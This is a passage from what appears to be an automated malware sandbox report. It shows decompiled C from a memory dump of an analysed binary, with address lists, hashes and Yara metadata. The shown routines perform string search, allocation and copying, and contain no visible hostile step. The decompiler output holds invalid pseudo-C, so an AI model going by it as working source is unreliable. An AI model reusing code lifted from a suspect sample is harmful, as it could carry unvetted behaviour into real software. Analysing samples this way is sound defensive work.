																goto L161;
															}
															_t417 = _t417 + 1;
															__eflags = _t417 - 0x7fffffff;
															if(_t417 < 0x7fffffff) {
																continue;
															} else {
																_v20 = _t291;
																goto L144;
															}
															goto L179;
														}
														goto L161;
													}
												}
												goto L179;
											}
											asm("bsf esi, ebx");
											_v20 = _t274;
											_t417 = _t417 + _t395;
											_t275 = _v24;
											goto L162;
										} else {
											_t291 = _v20;
											_t395 = _t273;
											_t417 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((char*)(_t417 + _t291));
												if( *((char*)(_t417 + _t291)) == 0) {
													break;
												}
												_t417 = _t417 + 1;
												__eflags = _t417 - _t273;
												if(_t417 < _t273) {
													continue;
												} else {
													_v20 = _t291;
													goto L136;
												}
												goto L179;
											}
											L161:
											_v20 = _t291;
											L162:
											__eflags = _t417;
											if(__eflags == 0) {
												L144:
												_t417 = 0x7fffffff;
												goto L145;
											} else {
												if(__eflags > 0) {
													L145:
													_v68 = _t417;
													_t296 = 0;
													__eflags = 0;
													_v36 = _t355;
													_v24 = _t275;
													while(1) {
														_t276 =  *((char*)(_t296 + _t307));
														_t357 =  *((char*)(_t296 + _v20));
														__eflags = _t276 - 0x61 - 0x19;
														_t277 =  <=  ? _t276 - 0x20 : _t276;
														__eflags = _t357 - 0x61 - 0x19;
														_t278 =  <=  ? _t276 - 0x20 : _t276;
														_t358 =  <=  ? _t357 - 0x20 : _t357;
														_t359 =  <=  ? _t357 - 0x20 : _t357;
														__eflags = _t278 - ( <=  ? _t357 - 0x20 : _t357);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t278;
														if(_t278 == 0) {
															L150:
															asm("o16 nop [eax+eax]");
															_t385 = _v60;
															_t333 = 0;
															__eflags = 0;
															goto L151;
														} else {
															_t296 = _t296 + 1;
															__eflags = _t296 - _v68;
															if(_t296 < _v68) {
																continue;
															} else {
																goto L150;
															}
														}
														goto L179;
													}
													_t360 = _v36;
													_t279 = _v24;
													_t421 = _t307 + 1;
													__eflags = _t421;
													if(_t421 == 0) {
														goto L54;
													} else {
														__eflags = _v44 - 0x19;
														_t298 =  <=  ? _v48 : _v40;
														_t291 =  <=  ? _v48 : _v40;
														__eflags =  *(_t307 + 1);
														if( *(_t307 + 1) == 0) {
															goto L54;
														} else {
															_v36 = _t360;
															_v24 = _t279;
															while(1) {
																_t307 = _t307 + 1;
																_t421 = _t421 + 1;
																_t361 =  *_t307 & 0x000000ff;
																__eflags =  *((char*)(_t421 - 1)) + 0xffffffbf - 0x19;
																_t362 =  <=  ? _t361 + 0x20 : _t361;
																__eflags = ( <=  ? _t361 + 0x20 : _t361) - _t291;
																if(( <=  ? _t361 + 0x20 : _t361) == _t291) {
																	goto L159;
																}
																__eflags =  *_t421;
																if( *_t421 != 0) {
																	continue;
																} else {
																	goto L54;
																}
																goto L179;
															}
															goto L159;
														}
													}
												} else {
													_v36 = _t355;
													_t333 = 0;
													_v24 = _t273;
													_t385 = _v60;
													L151:
													__eflags = _t307;
													if(_t307 != 0) {
														goto L49;
													} else {
														goto L55;
													}
												}
											}
										}
										L179:
										L159:
										_t355 = _v36;
										_t273 = _v24;
										__eflags = _t307;
									} while (_t307 != 0);
									goto L54;
								}
								break;
							}
							L55:
							_t386 = _t385 - _v64;
							__eflags = _t386;
							if(_t386 != 0) {
								__eflags = _v64;
								if(_v64 == 0) {
									_t334 = 0;
								} else {
									_t259 = _v64 & 0x0000000f;
									__eflags = _t259;
									if(_t259 == 0) {
										L69:
										_t334 =  ~( ~_t259 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										__eflags = _t334;
										while(1) {
											asm("movdqu xmm1, [ebx+eax]");
											asm("pcmpeqb xmm1, xmm0");
											asm("pmovmskb ecx, xmm1");
											__eflags = _t307;
											if(_t307 != 0) {
												break;
											}
											_t259 = _t259 + 0x10;
											__eflags = _t259 - _t334;
											if(_t259 < _t334) {
												continue;
											} else {
												__eflags = _t334 - 0x7fffffff;
												if(_t334 >= 0x7fffffff) {
													L76:
													_t334 = 0x7fffffff;
												} else {
													_t260 = _v64;
													while(1) {
														__eflags =  *((char*)(_t334 + _t260));
														if( *((char*)(_t334 + _t260)) == 0) {
															goto L77;
														}
														_t334 = _t334 + 1;
														__eflags = _t334 - 0x7fffffff;
														if(_t334 < 0x7fffffff) {
															continue;
														} else {
															goto L76;
														}
														goto L77;
													}
												}
											}
											goto L77;
										}
										asm("bsf edx, ecx");
										_t334 = _t334 + _t259;
									} else {
										_t334 = 0;
										_t307 = _v64;
										_t259 =  ~_t259 + 0x10;
										__eflags = _t259;
										while(1) {
											__eflags =  *((char*)(_t334 + _t307));
											if( *((char*)(_t334 + _t307)) == 0) {
												goto L77;
											}
											_t334 = _t334 + 1;
											__eflags = _t334 - _t259;
											if(_t334 < _t259) {
												continue;
											} else {
												goto L69;
											}
											goto L77;
										}
									}
								}
								L77:
								_t312 = _t334 >> 0x0000001f & _t334;
								_t335 = _t334 - _t312;
								__eflags = _t386;
								if(_t386 < 0) {
									L79:
									_t386 = _t335;
								} else {
									__eflags = _t386 - _t335;
									if(_t386 > _t335) {
										goto L79;
									}
								}
								_t336 = _a4;
								 *_t336 = 0;
								 *((intOrPtr*)(_t336 + 4)) = 0;
								_t293 = _t312 + _v64;
								__eflags = _t293;
								if(_t293 == 0) {
									L116:
									_push(0x40);
									_t287 = E00411030();
									_t431 = _t431 + 4;
									_t239 =  *_a4;
									__eflags = _t239;
									if(_t239 == 0) {
										 *_t287 = 0;
									} else {
										__eflags = _t287;
										if(_t287 != 0) {
											_t337 =  *_t239;
											 *_t287 = _t337;
											__eflags = _t337;
											if(_t337 != 0) {
												_t338 = 0;
												__eflags = 0;
												while(1) {
													_t338 = _t338 + 1;
													_t313 =  *((char*)(_t239 + _t338 * 2 - 1));
													 *(_t287 + _t338 * 2 - 1) = _t313;
													__eflags = _t313;
													if(_t313 == 0) {
														goto L122;
													}
													_t314 =  *((char*)(_t239 + _t338 * 2));
													 *(_t287 + _t338 * 2) = _t314;
													__eflags = _t314;
													if(_t314 != 0) {
														continue;
													}
													goto L122;
												}
											}
										}
										L122:
										_push(1);
										_push(_t239);
										E004110B0();
										_t431 = _t431 + 8;
									}
									goto L124;
								} else {
									_t241 = _v64;
									__eflags =  *(_t241 + _t312);
									if( *(_t241 + _t312) == 0) {
										goto L116;
									} else {
										__eflags = _t386;
										if(_t386 == 0) {
											_t254 = _t241 + _t312;
											_v64 = _t254;
											_t255 = _t254 & 0x0000000f;
											__eflags = _t255;
											if(_t255 == 0) {
												L87:
												_t386 =  ~( ~_t255 + 0x0000000f & 0x0000000f) + 0x7fffffff;
												__eflags = _t386;
												while(1) {
													asm("movdqu xmm1, [ecx+eax]");
													asm("pcmpeqb xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													__eflags = _t336;
													if(_t336 != 0) {
														break;
													}
													_t255 = _t255 + 0x10;
													__eflags = _t255 - _t386;
													if(_t255 < _t386) {
														continue;
													} else {
														__eflags = _t386 - 0x7fffffff;
														if(_t386 >= 0x7fffffff) {
															L94:
															_t386 = 0x7fffffff;
														} else {
															_t256 = _v64;
															while(1) {
																__eflags =  *((char*)(_t386 + _t256));
																if( *((char*)(_t386 + _t256)) == 0) {
																	goto L95;
																}
																_t386 = _t386 + 1;
																__eflags = _t386 - 0x7fffffff;
																if(_t386 < 0x7fffffff) {
																	continue;
																} else {
																	goto L94;
																}
																goto L95;
															}
														}
													}
													goto L95;
												}
												asm("bsf edi, edx");
												_t386 = _t386 + _t255;
											} else {
												_t386 = 0;
												_t336 = _v64;
												_t255 =  ~_t255 + 0x10;
												__eflags = _t255;
												while(1) {
													__eflags =  *((char*)(_t386 + _t336));
													if( *((char*)(_t386 + _t336)) == 0) {
														goto L95;
													}
													_t386 = _t386 + 1;
													__eflags = _t386 - _t255;
													if(_t386 < _t255) {
														continue;
													} else {
														goto L87;
													}
													goto L95;
												}
											}
										}
										L95:
										_t115 = _t386 + 1; // -2147483661
										_t339 = _t115;
										__eflags = _t339 - 0x40;
										_t340 =  <=  ? 0x40 : _t339;
										__eflags = _t340;
										if(_t340 > 0) {
											_t408 = (_t340 >> 5 >> 0x1a) + _t340 >> 6;
											_t341 = _t340 & 0x8000003f;
											__eflags = _t341;
											if(_t341 < 0) {
												_t341 = (_t341 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t341;
											}
											__eflags = _t341;
											_t410 = _t408 + (0 | _t341 > 0x00000000) << 6;
											_push(_t410);
											_t315 = E00411030();
											_t431 = _t431 + 4;
											_t342 =  *_a4;
											__eflags = _t342;
											if(_t342 == 0) {
												 *_t315 = 0;
											} else {
												__eflags = _t315;
												if(_t315 != 0) {
													_t250 =  *_t342;
													 *_t315 = _t250;
													__eflags = _t250;
													if(_t250 != 0) {
														__eflags = 0;
														_v60 = _t386;
														_v68 = _t293;
														_t294 = 0;
														while(1) {
															_t294 = _t294 + 1;
															_t252 =  *((char*)(_t342 + _t294 * 2 - 1));
															 *(_t315 + _t294 * 2 - 1) = _t252;
															__eflags = _t252;
															if(_t252 == 0) {
																break;
															}
															_t253 =  *((char*)(_t342 + _t294 * 2));
															 *(_t315 + _t294 * 2) = _t253;
															__eflags = _t253;
															if(_t253 != 0) {
																continue;
															}
															break;
														}
														_t386 = _v60;
														_t293 = _v68;
													}
												}
												_push(1);
												_push(_t342);
												_v68 = _t315;
												E004110B0();
												_t315 = _v68;
												_t431 = _t431 + 8;
											}
											_t247 = _a4;
											_t247[1] = _t410;
											 *_t247 = _t315;
										} else {
											_t315 = 0;
										}
										__eflags = _t315;
										if(_t315 != 0) {
											_t343 = 0;
											while(1) {
												_t248 =  *_t293;
												_t343 = _t343 + 1;
												 *_t315 = _t248;
												__eflags = _t386;
												if(_t386 == 0) {
													goto L114;
												}
												__eflags = _t343 - _t386;
												if(_t343 == _t386) {
													 *(_t315 + 1) = 0;
												} else {
													goto L114;
												}
												goto L125;
												L114:
												__eflags = _t248;
												if(_t248 != 0) {
													_t315 = _t315 + 1;
													_t293 = _t293 + 1;
													__eflags = _t293;
													continue;
												}
												goto L125;
											}
										}
									}
								}
							} else {
								_t351 = _a4;
								_push(0x40);
								 *_t351 = 0;
								 *((intOrPtr*)(_t351 + 4)) = 0;
								_t287 = E00411030();
								_t431 = _t431 + 4;
								_t265 =  *_a4;
								__eflags = _t265;
								if(_t265 == 0) {
									 *_t287 = 0;
								} else {
									__eflags = _t287;
									if(_t287 != 0) {
										_t352 =  *_t265;
										 *_t287 = _t352;
										__eflags = _t352;
										if(_t352 != 0) {
											_t353 = 0;
											__eflags = 0;
											while(1) {
												_t353 = _t353 + 1;
												_t317 =  *((char*)(_t265 + _t353 * 2 - 1));
												 *(_t287 + _t353 * 2 - 1) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													goto L62;
												}
												_t318 =  *((char*)(_t265 + _t353 * 2));
												 *(_t287 + _t353 * 2) = _t318;
												__eflags = _t318;
												if(_t318 != 0) {
													continue;
												}
												goto L62;
											}
										}
									}
									L62:
									_push(1);
									_push(_t265);
									E004110B0();
									_t431 = _t431 + 8;
								}
								L124:
								_t222 = _a4;
								 *_t222 = _t287;
								_t222[1] = 0x40;
							}
						}
					} else {
						goto L39;
					}
				}
				L125:
				_push(1);
				_push(_v56);
				E004110B0();
				_v56 = 0;
				_v52 = 0;
				return _a4;
				goto L179;
			}

0x00421ebe
0x00421ec2
0x00421ec4
0x00421ec8
0x00421ecf
0x00421ed1
0x00421ed4
0x00421eda
0x00421f11
0x00421edc
0x00421ede
0x00421ee0
0x00421ee3
0x00421ee7
0x00421ee9
0x00421eeb
0x00421eeb
0x00421eec
0x00421ef1
0x00421ef7
0x00000000
0x00000000
0x00421ef9
0x00421efd
0x00421f02
0x00000000
0x00000000
0x00000000
0x00421f02
0x00421eeb
0x00421ee7
0x00421f04
0x00421f04
0x00421f06
0x00421f07
0x00421f0c
0x00421f0c
0x00421f14
0x00421f18
0x00421f20
0x00421f26
0x00421f31
0x00421f33
0x0042269a
0x0042269f
0x00421f39
0x00421f3b
0x00421f3b
0x00421f3e
0x00421f56
0x00421f5a
0x00421f66
0x00421f66
0x00421f6c
0x00421f6c
0x00421f71
0x00421f75
0x00421f79
0x00421f7b
0x00000000
0x00000000
0x00421f81
0x00421f84
0x00421f86
0x00000000
0x00421f88
0x00421f88
0x00421f8e
0x00421fa3
0x00421fa3
0x00421fa8
0x00421f90
0x00421f90
0x00421f90
0x00421f94
0x00000000
0x00000000
0x00421f9a
0x00421f9b
0x00421fa1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421fa1
0x00000000
0x00421f90
0x00421f8e
0x00000000
0x00421f86
0x00422693
0x00422696
0x00000000
0x00421f40
0x00421f42
0x00421f44
0x00421f44
0x00421f47
0x00421f47
0x00421f4b
0x00000000
0x00000000
0x00421f51
0x00421f52
0x00421f54
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f54
0x00422678
0x00422678
0x0042267b
0x00422689
0x0042267d
0x0042267d
0x00422680
0x00422680
0x0042267b
0x00421f3e
0x00421fad
0x00421fb2
0x00421fb2
0x00421fb5
0x00421fb8
0x00421fbb
0x00421fbd
0x00421fd2
0x00421fd5
0x00421fd5
0x00421fdb
0x00421fe3
0x00421fe3
0x00421fe3
0x00421fe6
0x00421fed
0x00421ff0
0x00421ff6
0x00421ff8
0x00421ffb
0x00421fff
0x00422001
0x00422056
0x00422003
0x00422003
0x00422005
0x00422007
0x0042200a
0x0042200c
0x0042200e
0x00422010
0x00422014
0x00422014
0x00422016
0x0042201a
0x0042201d
0x0042201d
0x0042201e
0x00422023
0x00422027
0x00422029
0x00000000
0x00000000
0x0042202b
0x0042202f
0x00422032
0x00422034
0x00000000
0x00000000
0x00000000
0x00422034
0x00422036
0x0042203a
0x0042203e
0x0042203e
0x0042200e
0x00422041
0x00422043
0x00422044
0x00422048
0x0042204d
0x00422051
0x00422051
0x00422059
0x0042205d
0x00421fbf
0x00421fbf
0x00421fbf
0x00422065
0x00422068
0x0042206e
0x00421f28
0x00421f28
0x00421f28
0x00422073
0x00422077
0x00422084
0x00422084
0x00422089
0x0042208b
0x0042208d
0x00422095
0x00422097
0x0042209d
0x004220a1
0x004220db
0x004220a3
0x004220a5
0x004220a7
0x004220aa
0x004220ae
0x004220b0
0x004220b2
0x004220b2
0x004220b3
0x004220b8
0x004220be
0x00000000
0x00000000
0x004220c0
0x004220c4
0x004220c9
0x00000000
0x00000000
0x00000000
0x004220c9
0x004220b2
0x004220ae
0x004220cb
0x004220cb
0x004220cd
0x004220ce
0x004220d3
0x004220d3
0x00000000
0x00422079
0x00422079
0x0042207c
0x00422082
0x004220e7
0x004220f0
0x004220f2
0x004220f4
0x00422619
0x0042261e
0x00422620
0x00422622
0x0042262a
0x0042262c
0x00422632
0x00422634
0x00422636
0x00422670
0x00422638
0x00422638
0x0042263a
0x0042263c
0x0042263f
0x00422641
0x00422643
0x00422645
0x00422645
0x00422647
0x00422647
0x00422648
0x0042264d
0x00422651
0x00422653
0x00000000
0x00000000
0x00422655
0x00422659
0x0042265c
0x0042265e
0x00000000
0x00000000
0x00000000
0x0042265e
0x00422647
0x00422643
0x00422660
0x00422660
0x00422662
0x00422663
0x00422668
0x00422668
0x00000000
0x004220fa
0x004220fa
0x00422100
0x00422103
0x00422107
0x0042210b
0x00422112
0x00422120
0x00422124
0x00422128
0x00422128
0x0042212a
0x0042212a
0x0042212c
0x0042212e
0x0042212e
0x0042212f
0x00000000
0x00000000
0x00422131
0x00422135
0x00422137
0x0042213c
0x00422142
0x00422147
0x0042214a
0x0042214e
0x00422152
0x00422152
0x00422153
0x00422158
0x0042215b
0x00422162
0x00422165
0x0042216b
0x0042216e
0x00422170
0x00422174
0x00000000
0x00000000
0x0042217a
0x0042217d
0x00000000
0x0042217f
0x0042217f
0x0042217f
0x0042217f
0x00000000
0x0042217d
0x00422482
0x00422486
0x0042248a
0x0042248e
0x0042248e
0x00422490
0x00422492
0x004224af
0x004224bb
0x004224bf
0x004224bf
0x004224c5
0x004224c9
0x004224c9
0x004224ce
0x004224d2
0x004224d6
0x004224d8
0x00000000
0x00000000
0x004224de
0x004224e1
0x004224e3
0x00000000
0x004224e5
0x004224e5
0x004224e9
0x004224ed
0x004224f3
0x00000000
0x004224f5
0x004224f5
0x004224f9
0x004224f9
0x004224fd
0x00000000
0x00000000
0x00422503
0x00422504
0x0042250a
0x00000000
0x0042250c
0x0042250c
0x00000000
0x0042250c
0x00000000
0x0042250a
0x00000000
0x004224f9
0x004224f3
0x00000000
0x004224e3
0x0042260a
0x0042260d
0x00422611
0x00422613
0x00000000
0x00422494
0x00422494
0x00422498
0x0042249a
0x0042249a
0x0042249c
0x0042249c
0x004224a0
0x00000000
0x00000000
0x004224a6
0x004224a7
0x004224a9
0x00000000
0x004224ab
0x004224ab
0x00000000
0x004224ab
0x00000000
0x004224a9
0x004225e5
0x004225e5
0x004225e9
0x004225e9
0x004225eb
0x00422510
0x00422510
0x00000000
0x004225f1
0x004225f1
0x00422515
0x00422515
0x00422518
0x00422518
0x0042251a
0x0042251e
0x00422522
0x00422526
0x0042252a
0x00422531
0x0042253a
0x0042253d
0x00422540
0x00422546
0x00422549
0x0042254c
0x0042254e
0x00000000
0x00000000
0x00422552
0x00422554
0x0042255c
0x0042255c
0x00422562
0x00422566
0x00422566
0x00000000
0x00422556
0x00422556
0x00422557
0x0042255a
0x00000000
0x00000000
0x00000000
0x00000000
0x0042255a
0x00000000
0x00422554
0x00422575
0x00422579
0x0042257f
0x0042257f
0x00422580
0x00000000
0x00422586
0x00422586
0x0042258f
0x00422594
0x00422597
0x0042259b
0x00000000
0x004225a1
0x004225a1
0x004225a5
0x004225a9
0x004225a9
0x004225aa
0x004225ab
0x004225b5
0x004225bb
0x004225be
0x004225c0
0x00000000
0x00000000
0x004225c2
0x004225c5
0x00000000
0x004225c7
0x00000000
0x004225c7
0x00000000
0x004225c5
0x00000000
0x004225a9
0x0042259b
0x004225f7
0x004225f7
0x004225fb
0x004225fd
0x00422601
0x00422568
0x00422568
0x0042256a
0x00000000
0x00422570
0x00000000
0x00422570
0x0042256a
0x004225f1
0x004225eb
0x00000000
0x004225d0
0x004225d0
0x004225d4
0x004225d8
0x004225d8
0x00000000
0x004225e0
0x00000000
0x00422135
0x00422183
0x00422183
0x00422183
0x00422187
0x004221e8
0x004221ed
0x0042247b
0x004221f3
0x004221f7
0x004221f7
0x004221fa
0x00422212
0x00422222
0x00422222
0x00422228
0x00422228
0x0042222d
0x00422231
0x00422235
0x00422237
0x00000000
0x00000000
0x0042223d
0x00422240
0x00422242
0x00000000
0x00422244
0x00422244
0x0042224a
0x0042225f
0x0042225f
0x0042224c
0x0042224c
0x00422250
0x00422250
0x00422254
0x00000000
0x00000000
0x00422256
0x00422257
0x0042225d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042225d
0x00422250
0x0042224a
0x00000000
0x00422242
0x00422471
0x00422474
0x004221fc
0x004221fe
0x00422200
0x00422204
0x00422204
0x00422207
0x00422207
0x0042220b
0x00000000
0x00000000
0x0042220d
0x0042220e
0x00422210
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00422210
0x00422207
0x004221fa
0x00422264
0x00422269
0x0042226b
0x0042226d
0x0042226f
0x00422275
0x00422275
0x00422271
0x00422271
0x00422273
0x00000000
0x00000000
0x00422273
0x00422277
0x0042227e
0x00422280
0x00422283
0x00422283
0x00422287
0x004223e1
0x004223e1
0x004223e8
0x004223ea
0x004223f0
0x004223f2
0x004223f4
0x0042242b
0x004223f6
0x004223f6
0x004223f8
0x004223fa
0x004223fd
0x004223ff
0x00422401
0x00422403
0x00422403
0x00422405
0x00422405
0x00422406
0x0042240b
0x0042240f
0x00422411
0x00000000
0x00000000
0x00422413
0x00422417
0x0042241a
0x0042241c
0x00000000
0x00000000
0x00000000
0x0042241c
0x00422405
0x00422401
0x0042241e
0x0042241e
0x00422420
0x00422421
0x00422426
0x00422426
0x00000000
0x0042228d
0x0042228d
0x00422291
0x00422295
0x00000000
0x0042229b
0x0042229b
0x0042229d
0x0042229f
0x004222a1
0x004222a5
0x004222a5
0x004222a8
0x004222c0
0x004222d0
0x004222d0
0x004222d6
0x004222d6
0x004222db
0x004222df
0x004222e3
0x004222e5
0x00000000
0x00000000
0x004222eb
0x004222ee
0x004222f0
0x00000000
0x004222f2
0x004222f2
0x004222f8
0x0042230d
0x0042230d
0x004222fa
0x004222fa
0x004222fe
0x004222fe
0x00422302
0x00000000
0x00000000
0x00422304
0x00422305
0x0042230b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042230b
0x004222fe
0x004222f8
0x00000000
0x004222f0
0x00422467
0x0042246a
0x004222aa
0x004222ac
0x004222ae
0x004222b2
0x004222b2
0x004222b5
0x004222b5
0x004222b9
0x00000000
0x00000000
0x004222bb
0x004222bc
0x004222be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004222be
0x004222b5
0x004222a8
0x00422312
0x00422317
0x00422317
0x0042231a
0x0042231d
0x00422320
0x00422322
0x00422335
0x00422338
0x00422338
0x0042233e
0x00422346
0x00422346
0x00422346
0x00422349
0x00422350
0x00422353
0x00422359
0x0042235b
0x00422361
0x00422363
0x00422365
0x004223b4
0x00422367
0x00422367
0x00422369
0x0042236b
0x0042236e
0x00422370
0x00422372
0x00422374
0x00422376
0x0042237a
0x0042237d
0x0042237f
0x0042237f
0x00422380
0x00422385
0x00422389
0x0042238b
0x00000000
0x00000000
0x0042238d
0x00422391
0x00422394
0x00422396
0x00000000
0x00000000
0x00000000
0x00422396
0x00422398
0x0042239c
0x0042239c
0x00422372
0x0042239f
0x004223a1
0x004223a2
0x004223a6
0x004223ab
0x004223af
0x004223af
0x004223b7
0x004223ba
0x004223bd
0x00422324
0x00422324
0x00422324
0x004223bf
0x004223c1
0x004223c3
0x004223c9
0x004223c9
0x004223cc
0x004223cd
0x004223cf
0x004223d1
0x00000000
0x00000000
0x004223d3
0x004223d5
0x00422461
0x00000000
0x00000000
0x00000000
0x00000000
0x004223db
0x004223db
0x004223dd
0x004223c7
0x004223c8
0x004223c8
0x00000000
0x004223c8
0x00000000
0x004223dd
0x004223c9
0x004223c1
0x00422295
0x00422189
0x00422189
0x0042218e
0x00422190
0x00422192
0x0042219a
0x0042219c
0x004221a2
0x004221a4
0x004221a6
0x004221e0
0x004221a8
0x004221a8
0x004221aa
0x004221ac
0x004221af
0x004221b1
0x004221b3
0x004221b5
0x004221b5
0x004221b7
0x004221b7
0x004221b8
0x004221bd
0x004221c1
0x004221c3
0x00000000
0x00000000
0x004221c5
0x004221c9
0x004221cc
0x004221ce
0x00000000
0x00000000
0x00000000
0x004221ce
0x004221b7
0x004221b3
0x004221d0
0x004221d0
0x004221d2
0x004221d3
0x004221d8
0x004221d8
0x0042242e
0x0042242e
0x00422431
0x00422433
0x00422433
0x00422187
0x00000000
0x00000000
0x00000000
0x00422082
0x0042243a
0x0042243a
0x0042243c
0x00422440
0x0042244a
0x0042244e
0x0042245e
0x00000000

Strings

@, xrefs: 00421F18

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction ID: 1118a4f7e6ac0846f8afd5f56bd90b6a8869adb04ce64bcf6a31f5a5817ab537
Opcode Fuzzy Hash: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction Fuzzy Hash: 39325C31B083A2ABD715CB29D58032B7BD26FD5300F98866FE8958B355DBBDC841C746

Uniqueness

Uniqueness Score: -1.00%

Function 004226B0, Relevance: 1.9, Strings: 1, Instructions: 653
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E004226B0(signed int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t183;
				signed int _t184;
				signed int* _t190;
				signed int _t194;
				signed int* _t195;
				signed int _t200;
				signed int _t204;
				void* _t206;
				signed int _t209;
				signed int _t212;
				signed int _t217;
				signed int* _t219;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t235;
				char _t236;
				signed int _t240;
				void* _t241;
				void* _t242;
				unsigned int _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				char _t260;
				char _t261;
				signed int _t262;
				signed int _t263;
				signed int _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t280;
				void* _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t303;
				signed int _t305;
				char _t306;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t329;
				char _t331;
				char _t332;
				char _t333;
				signed int _t335;
				unsigned int _t340;
				signed int _t342;
				intOrPtr _t344;
				intOrPtr _t346;
				signed int _t347;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t383;
				signed int _t384;
				void* _t387;

				_v52 = 0;
				_t231 = __ecx;
				_v48 = 0;
				_push(0x40);
				_t335 = E00411030();
				_t387 = (_t384 & 0xfffffff0) - 0x34 + 4;
				_t183 = _v52;
				if(_t183 == 0) {
					 *_t335 = 0;
					L8:
					_t184 = _a8;
					_v48 = 0x40;
					_v52 = _t335;
					if(_t184 != 0) {
						__eflags = _t335;
						if(_t335 == 0) {
							_t257 = 0x40;
							_t361 = 0;
							L22:
							_t20 = _t361 + 2; // 0x80000001
							_t290 = _t20;
							__eflags = _t290 - 0x40;
							_t291 =  <=  ? 0x40 : _t290;
							__eflags = _t257 - _t291;
							if(_t257 < _t291) {
								_t340 = (_t291 >> 5 >> 0x1a) + _t291 >> 6;
								_t292 = _t291 & 0x8000003f;
								__eflags = _t292;
								if(_t292 < 0) {
									_t292 = (_t292 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t292;
								}
								__eflags = _t292;
								_t342 = _t340 + (0 | _t292 > 0x00000000) << 6;
								_push(_t342);
								_t258 = E00411030();
								_t387 = _t387 + 4;
								_t293 = _v52;
								__eflags = _t293;
								if(_t293 == 0) {
									 *_t258 = 0;
									goto L35;
								} else {
									__eflags = _t258;
									if(_t258 == 0) {
										L33:
										_push(1);
										_push(_t293);
										_v68 = _t258;
										E004110B0();
										_t258 = _v68;
										_t387 = _t387 + 8;
										L35:
										_v48 = _t342;
										_v52 = _t258;
										L36:
										 *((char*)(_t258 + _t361)) = _a8;
										_t190 =  &_v52;
										 *((char*)(_t361 +  *_t190 + 1)) = 0;
										L37:
										_t259 =  *_t190;
										if(_t259 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t232 = E00411030();
											_t387 = _t387 + 4;
											_t194 =  *_a4;
											if(_t194 == 0) {
												 *_t232 = 0;
												L60:
												_t195 = _a4;
												 *_t195 = _t232;
												_t195[1] = 0x40;
												L61:
												_push(1);
												_push(_v52);
												E004110B0();
												_v52 = 0;
												_v48 = 0;
												return _a4;
											}
											if(_t232 == 0) {
												L45:
												_push(1);
												_push(_t194);
												E004110B0();
												_t387 = _t387 + 8;
												goto L60;
											}
											_t296 =  *_t194;
											 *_t232 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t260 =  *((char*)(_t194 + _t297 * 2 - 1));
												 *((char*)(_t232 + _t297 * 2 - 1)) = _t260;
												if(_t260 == 0) {
													goto L45;
												}
												_t261 =  *((char*)(_t194 + _t297 * 2));
												 *((char*)(_t232 + _t297 * 2)) = _t261;
												if(_t261 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t344 =  *_t259;
										if(_t344 != 0) {
											_t200 =  *_t231;
											__eflags = _t200;
											if(_t200 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t232 = E00411030();
												_t387 = _t387 + 4;
												_t204 =  *_a4;
												__eflags = _t204;
												if(_t204 == 0) {
													 *_t232 = 0;
													goto L60;
												}
												__eflags = _t232;
												if(_t232 == 0) {
													L58:
													_push(1);
													_push(_t204);
													E004110B0();
													_t387 = _t387 + 8;
													goto L60;
												}
												_t299 =  *_t204;
												 *_t232 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t262 =  *((char*)(_t204 + _t300 * 2 - 1));
													 *(_t232 + _t300 * 2 - 1) = _t262;
													__eflags = _t262;
													if(_t262 == 0) {
														goto L58;
													}
													_t263 =  *((char*)(_t204 + _t300 * 2));
													 *(_t232 + _t300 * 2) = _t263;
													__eflags = _t263;
